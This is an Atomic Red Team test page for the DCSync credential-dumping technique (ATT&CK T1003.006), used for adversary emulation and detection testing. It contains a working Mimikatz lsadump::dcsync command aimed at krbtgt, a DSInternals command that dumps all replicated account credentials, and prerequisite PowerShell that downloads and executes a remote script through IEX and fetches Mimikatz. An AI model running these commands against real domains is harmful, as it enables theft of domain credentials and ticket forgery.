T1003.006
OS Credential Dumping: DCSync
Description from ATT&CK
Adversaries may attempt to access credentials and other sensitive information by abusing a Windows Domain Controller's application programming interface (API)(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller using a technique called DCSync.
Members of the Administrators, Domain Admins, and Enterprise Admin groups or computer accounts on the domain controller are able to run DCSync to pull password data(Citation: ADSecurity Mimikatz DCSync) from Active Directory, which may include current and historical hashes of potentially useful accounts such as KRBTGT and Administrators. The hashes can then in turn be used to create a Golden Ticket for use in Pass the Ticket(Citation: Harmj0y Mimikatz and DCSync) or change an account's password as noted in Account Manipulation.(Citation: InsiderThreat ChangeNTLM July 2017)
DCSync functionality has been included in the "lsadump" module in Mimikatz.(Citation: GitHub Mimikatz lsadump Module) Lsadump also includes NetSync, which performs DCSync over a legacy replication protocol.(Citation: Microsoft NRPC Dec 2017)
Atomic Tests
Atomic Test #1 - DCSync (Active Directory)
Active Directory attack allowing retrieval of account information without accessing memory or retrieving the NTDS database. Works against a remote Windows Domain Controller using the replication protocol. Privileges required: domain admin or domain controller account (by default), or any other account with required rights. Reference
Supported Platforms: windows
auto_generated_guid: 129efd28-8497-4c87-a1b0-73b9a870ca3e
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| domain | Targeted Active Directory domain | string | %userdnsdomain% |
| user | Targeted user | string | krbtgt |
| mimikatz_path | Mimikatz windows executable | path | %tmp%\mimikatz\x64\mimikatz.exe |
Attack Commands: Run with command_prompt!
1
2
#{mimikatz_path} "lsadump::dcsync /domain:#{domain} /user:#{user}@#{domain}" "exit"
Dependencies: Run with powershell!
Description: Mimikatz executor must exist on disk and at specified location (#{mimikatz_path})
Check Prereq Commands:
1
2
3
$mimikatz_path = cmd /c echo #{mimikatz_path}
if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
Get Prereq Commands:
1
2
3
4
5
6
7
8
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
$releases = "https://api.github.com/repos/gentilkiwi/mimikatz/releases"
$zipUrl = (Invoke-WebRequest $releases | ConvertFrom-Json)[0].assets.browser_download_url | where-object { $_.endswith(".zip") }
$mimikatz_exe = cmd /c echo #{mimikatz_path}
$basePath = Split-Path $mimikatz_exe | Split-Path
Invoke-FetchFromZip $zipUrl "x64/mimikatz.exe" $basePath
Atomic Test #2 - Run DSInternals Get-ADReplAccount
The following Atomic will run Get-ADReplAccount from DSInternals. Upon successful execution, domain and credentials will appear in stdout. Reference CrowdStrike StellarParticle. https://www.dsinternals.com/en/retrieving-active-directory-passwords-remotely/
Supported Platforms: windows
auto_generated_guid: a0bced08-3fc5-4d8b-93b7-e8344739376e
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| logonserver | ComputerName argument default %logonserver% | string | $ENV:logonserver.TrimStart("\") |
Attack Commands: Run with powershell!
1
2
Get-ADReplAccount -All -Server #{logonserver}
Dependencies: Run with powershell!
Description: DSInternals must be installed
Check Prereq Commands:
1
2
3
4
$RequiredModule = Get-Module -Name DSInternals -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['DSInternals']) {exit 1} else {exit 0}
Get Prereq Commands:
1
2
Install-Module -Name DSInternals -Scope CurrentUser -Force